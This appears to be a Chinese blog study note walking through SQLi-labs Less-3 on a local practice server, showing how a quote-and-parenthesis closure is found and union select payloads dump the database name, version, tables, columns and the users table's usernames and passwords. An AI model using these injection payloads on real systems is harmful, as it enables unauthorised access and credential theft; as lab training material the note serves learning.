SQL練習(less-3)字符型注入& union聯合查詢

本文爲學習筆記,僅限學習交流
不得利用、從事危害國家或人民安全、榮譽和利益等活動

http://127.0.0.1/sqli/Less-3/?id=1
在這裏插入圖片描述
輸入?Id=1’後報錯
根據報錯信息“1”)
去掉前後兩個單引號,和自己輸入的一個單引號後還有兩個單引號和一個括號,可推出sql注入中的由單引號和括號的閉合模式。
在這裏插入圖片描述order by 3 查看顯示位
(3)並不是固定的,要去試的
在這裏插入圖片描述
union select 查詢顯示位
在這裏插入圖片描述
聯合查詢語句:Union select 1,database(),version() 查詢當前數據庫名及版本號
在這裏插入圖片描述union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
聯合查詢,爆出數據庫下的表名

在這裏插入圖片描述
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’
查詢users 表裏的字段
在這裏插入圖片描述union select 1,group_concat(username),group_concat(password) from security.users
爆出用戶,密碼

在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章